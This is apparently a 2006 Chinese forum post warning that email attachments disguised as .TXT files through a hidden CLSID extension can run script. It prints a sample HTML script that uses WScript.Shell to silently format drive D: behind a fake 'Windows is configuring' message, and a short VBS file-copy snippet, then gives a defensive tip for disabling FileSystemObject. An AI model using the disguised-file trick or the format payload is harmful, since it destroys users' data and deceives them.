[这个贴子最后由流浪的逍遥在 2006/06/05 09:53pm 第 1 次编辑]
大家都知道,现在大多数病毒的传播媒介都是可执行文件或脚本文件,但当你收到一分附件为.TXT为后缀名的邮件时,你会不会有所警觉呢?在一定程度上也可以造成破坏!由于目前大多数人使用的是Windows系列的操作系统,而Windows设置是隐藏已知文件扩展名。当你点击那个看上去很友善的文件时,那些破坏性的东西就会一一跳了出来。
假如你收到一分邮件,附件里的文件名为“美媚大放送.TXT”,你是不是会认定他肯定是纯文本文件呢?那可不一定哦!它的实际文件名可以是“美媚大放送.TXT.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”。其中的“{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}”在注册表里的含义是HTML文件关联。但是存成文件时它就不会显现出来,你看到的这个.TXT文件其实就是“美媚大放送.TXT.HTML”。那么打开这个文件又会有什么危害呢?如果这个文件的内容如下(警告:以下代码可能带有攻击性,禁止乱用,一切使用后过自负!):
〈script〉
a=new ActiveXObject("WSCript.Shell");
a.run("format.com D:/q /autotest /u");
alert("Windows is configuring the system. Please do not interrupt this process.");
〈/script〉
那么它就会调用IE运行FORMAT命令,同时显示“Windows is configuring the system. Please
do not interrupt this process.”,呵呵,这下你可就惨了。要注意哦~
大家大概已经注意到第二行的“WSCript”了吧,对啊,就是它在导演着这场戏。
WSCript全称“Windows Scripting Host”,它是Windows 98新增的功能,是一种批次语言/自动执行工具——它所对应的程序“WSCript.exe”是一个脚本语言解释器,为于WINDOWS目录下,正是它才使得脚本可以被执行,就象执行批处理一样。在Windows Scripting Host脚本环境里,预定义了一些对象,通过它自带的几个对象,可以实现获取环境变量、创建快捷方式、加载程序、读写注册表等功能。
下面我们通过一个小的例子来说明WSCript的功能是如何的强大,而使用又是何等的简单,被人利用的威胁有是如何之大。例如有一个.vbs文件:
Set so=CreatObject(Scripting.FileSystemObject")
so.GetFile(c:\Windows\winipcfg.exe).Copy("e:\winipcfg.exe")
这么短短的两行就可以COPY一个文件到指定位置。第一行:创建一个文件系统对象;第二行:打开脚本文件,c:\Windows\winipcfg.exe指明这个程序本身,是一个完整的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复制到E盘根目录下。这也是现今大多数利用VBscript编写的病毒的一个特点。由此可以看出禁止FileSystemObject对象就可以有效地控制这种病毒的传播。禁止FileSystemObject对象可用如下命令:
regsvr32 scrrun.dll /u
好了,只写这些了,最后还要说一句,OUTLOOK问题多多,少用为好,建议收发信使用FoxMail,同时也支持一下国产软件! |